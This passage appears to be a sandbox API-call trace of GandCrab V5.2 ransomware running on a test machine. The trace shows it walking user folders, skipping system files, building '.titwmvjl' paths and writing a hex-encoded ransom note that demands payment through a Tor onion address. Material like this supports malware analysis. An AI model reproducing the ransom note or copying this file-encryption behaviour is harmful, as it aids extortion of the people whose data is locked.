4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0093.985] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0093.986] CloseHandle (hObject=0x2ac) returned 1 [0093.986] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.986] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.986] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x12e)) [0093.986] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.987] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.987] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.987] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a09d2ca4deb61a.lock") returned 70 [0093.987] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\saved pictures\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0093.989] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.989] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.989] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\") returned 46 [0093.989] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\*" [0093.989] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5031f8 [0093.989] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.989] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.989] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.989] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.989] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.989] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0093.989] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0093.989] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a09d2ca4deb61a.lock" [0093.989] lstrlenW (lpString=".titwmvjl") returned 9 [0093.989] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a09d2ca4deb61a.lock") returned 70 [0093.990] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.990] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 79 [0093.990] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a09d2ca4deb61a.lock") returned 70 [0093.990] lstrlenW (lpString=".lock") returned 5 [0093.990] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.990] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0093.990] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.990] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.990] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.990] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0093.990] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0093.990] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini" [0093.990] lstrlenW (lpString=".titwmvjl") returned 9 [0093.990] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini") returned 57 [0093.990] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.991] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini.titwmvjl") returned 66 [0093.991] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini") returned 57 [0093.991] lstrlenW (lpString=".ini") returned 4 [0093.991] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.991] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0093.991] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0093.991] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.991] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini") returned 57 [0093.991] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini") returned 57 [0093.991] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0093.991] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.991] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.991] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0093.991] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0093.991] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\TITWMVJL-DECRYPT.txt" [0093.991] lstrlenW (lpString=".titwmvjl") returned 9 [0093.991] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\TITWMVJL-DECRYPT.txt") returned 66 [0093.991] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.992] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 75 [0093.992] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\TITWMVJL-DECRYPT.txt") returned 66 [0093.992] lstrlenW (lpString=".txt") returned 4 [0093.992] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.992] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0093.992] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0093.992] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.992] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\TITWMVJL-DECRYPT.txt") returned 66 [0093.992] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\TITWMVJL-DECRYPT.txt") returned 66 [0093.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0093.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0093.992] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0093.992] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.992] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0093.992] FindClose (in: hFindFile=0x5031f8 | out: hFindFile=0x5031f8) returned 1 [0093.993] CloseHandle (hObject=0x2ac) returned 1 [0093.993] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.993] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0093.993] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0093.993] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\TITWMVJL-DECRYPT.txt" [0093.993] lstrlenW (lpString=".titwmvjl") returned 9 [0093.993] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\TITWMVJL-DECRYPT.txt") returned 51 [0093.993] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.993] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 60 [0093.993] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\TITWMVJL-DECRYPT.txt") returned 51 [0093.993] lstrlenW (lpString=".txt") returned 4 [0093.993] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.993] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0093.993] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0093.993] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.993] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\TITWMVJL-DECRYPT.txt") returned 51 [0093.993] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\TITWMVJL-DECRYPT.txt") returned 51 [0093.993] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.993] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.993] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0093.993] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.993] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.994] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.994] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0093.994] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0093.994] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.994] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.994] lstrcmpW (lpString1="V_u2", lpString2=".") returned 1 [0093.994] lstrcmpW (lpString1="V_u2", lpString2="..") returned 1 [0093.994] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="V_u2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2" [0093.994] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\" [0093.994] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0093.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.994] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.994] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.995] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.995] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.995] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.995] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.995] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\\\TITWMVJL-DECRYPT.txt") returned 57 [0093.995] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0093.997] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x